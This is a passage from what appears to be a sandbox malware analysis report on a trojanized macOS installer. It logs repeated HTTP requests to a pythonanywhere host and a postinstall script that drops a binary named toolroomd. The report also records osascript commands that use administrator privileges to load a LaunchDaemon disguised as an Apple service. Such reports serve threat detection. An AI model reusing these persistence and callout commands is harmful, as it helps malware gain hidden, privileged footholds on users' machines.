free plan gives you access to machines with everything already set up for you. You
Jun 7, 2021 19:14:56.437623024 CEST	85	IN	Data Raw: 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d Data Ascii: can develop and host your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Up
Jun 7, 2021 19:14:56.437634945 CEST	85	IN	Data Raw: 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 Data Ascii: a>. </p> <p> If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the fo

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.11.11	49254	35.173.69.207	80

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 19:14:58.301285028 CEST	86	OUT	GET /ret.txt HTTP/1.0 Host: andrewka6.pythonanywhere.com
Jun 7, 2021 19:14:58.402154922 CEST	87	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Jun 2021 17:14:58 GMT Content-Type: text/html Content-Length: 2921 Connection: close ETag: "6048c864-b69" Server: PythonAnywhere Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You
Jun 7, 2021 19:14:58.402209997 CEST	89	IN	Data Raw: 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d Data Ascii: can develop and host your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Up
Jun 7, 2021 19:14:58.402256012 CEST	89	IN	Data Raw: 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 Data Ascii: a>. </p> <p> If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the fo

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.11.11	49255	35.173.69.207	80

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 19:14:58.942178965 CEST	90	OUT	GET /ret.txt HTTP/1.0 Host: andrewka6.pythonanywhere.com
Jun 7, 2021 19:14:59.047353029 CEST	91	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Jun 2021 17:14:58 GMT Content-Type: text/html Content-Length: 2921 Connection: close ETag: "6048c864-b69" Server: PythonAnywhere Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You
Jun 7, 2021 19:14:59.047460079 CEST	93	IN	Data Raw: 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d Data Ascii: can develop and host your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Up
Jun 7, 2021 19:14:59.047509909 CEST	93	IN	Data Raw: 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 Data Ascii: a>. </p> <p> If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the fo

System Behavior

Analysis Process: xpcproxy PID: 611 Parent PID: 1

General

Start time:	19:13:55
Start date:	07/06/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	43488 bytes
MD5 hash:	d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: Installer PID: 611 Parent PID: 1

General

Start time:	19:13:55
Start date:	07/06/2021
Path:	/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer
Arguments:	/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer
File size:	276432 bytes
MD5 hash:	2b8f384afb853369052069c49489032b

Chronological Activities

Analysis Process: xpcproxy PID: 619 Parent PID: 1

General

Start time:	19:14:00
Start date:	07/06/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	43488 bytes
MD5 hash:	d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: installd PID: 619 Parent PID: 1

General

Start time:	19:14:00
Start date:	07/06/2021
Path:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
Arguments:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File size:	24288 bytes
MD5 hash:	c2d8282e932e781e024c558ec4c8b3d2

Chronological Activities

Analysis Process: install_monitor PID: 631 Parent PID: 619

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor
Arguments:	n/a
File size:	29680 bytes
MD5 hash:	a1b67ef43354aa9ebd384a2d6673de2f

Chronological Activities

Analysis Process: shove PID: 632 Parent PID: 619

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/shove
Arguments:	n/a
File size:	42384 bytes
MD5 hash:	cbd8338ff16af4c4b6bd4c95d10976f3

Chronological Activities

Analysis Process: postinstall PID: 633 Parent PID: 619

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/tmp/PKInstallSandbox.itFDGL/Scripts/com.mixedinkey.installer.tVvVCe/postinstall
Arguments:	n/a
File size:	190 bytes
MD5 hash:	03fc4e3ef9bdbccd7ea68537970ce472

Chronological Activities

Analysis Process: sh PID: 635 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: mkdir PID: 635 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/mkdir
Arguments:	mkdir /Library/mixednkey
File size:	18592 bytes
MD5 hash:	135a3b94b3d9efccb4c8cd23ac404571

Chronological Activities

Analysis Process: sh PID: 636 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: mv PID: 636 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/mv
Arguments:	mv /Applications/Utils/patch /Library/mixednkey/toolroomd
File size:	24240 bytes
MD5 hash:	7f791dd4bef08d618fece911d6e3398a

Chronological Activities

Analysis Process: sh PID: 637 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: rmdir PID: 637 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/rmdir
Arguments:	rmdir /Application/Utils
File size:	18160 bytes
MD5 hash:	bffabbed652aed3e9a609299e64d1097

Chronological Activities

Analysis Process: sh PID: 638 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: chmod PID: 638 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/chmod
Arguments:	chmod +x /Library/mixednkey/toolroomd
File size:	30016 bytes
MD5 hash:	30e3e10a3e7ad9adfd37662b2e9b4f8a

Chronological Activities

Analysis Process: sh PID: 639 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: toolroomd PID: 639 Parent PID: 633

General

Start time:	19:14:51
Start date:	07/06/2021
Path:	/Library/mixednkey/toolroomd
Arguments:	/Library/mixednkey/toolroomd
File size:	87920 bytes
MD5 hash:	322f4fb8f257a2e651b128c41df92b1d

Chronological Activities

Analysis Process: sh PID: 642 Parent PID: 639

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 642 Parent PID: 639

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 643 Parent PID: 642

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 643 Parent PID: 642

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 643 Parent PID: 642

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 643 Parent PID: 642

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 643 Parent PID: 642

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 644 Parent PID: 643

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 644 Parent PID: 643

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 646 Parent PID: 643

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 646 Parent PID: 643

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 648 Parent PID: 639

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 648 Parent PID: 639

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 649 Parent PID: 648

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 649 Parent PID: 648

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 649 Parent PID: 648

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 649 Parent PID: 648

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 649 Parent PID: 648

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 650 Parent PID: 649

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 650 Parent PID: 649

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 651 Parent PID: 649

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 651 Parent PID: 649

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 652 Parent PID: 639

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 652 Parent PID: 639

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 653 Parent PID: 652

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 653 Parent PID: 652

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 653 Parent PID: 652

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 653 Parent PID: 652

General

Start time:	19:14:55
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
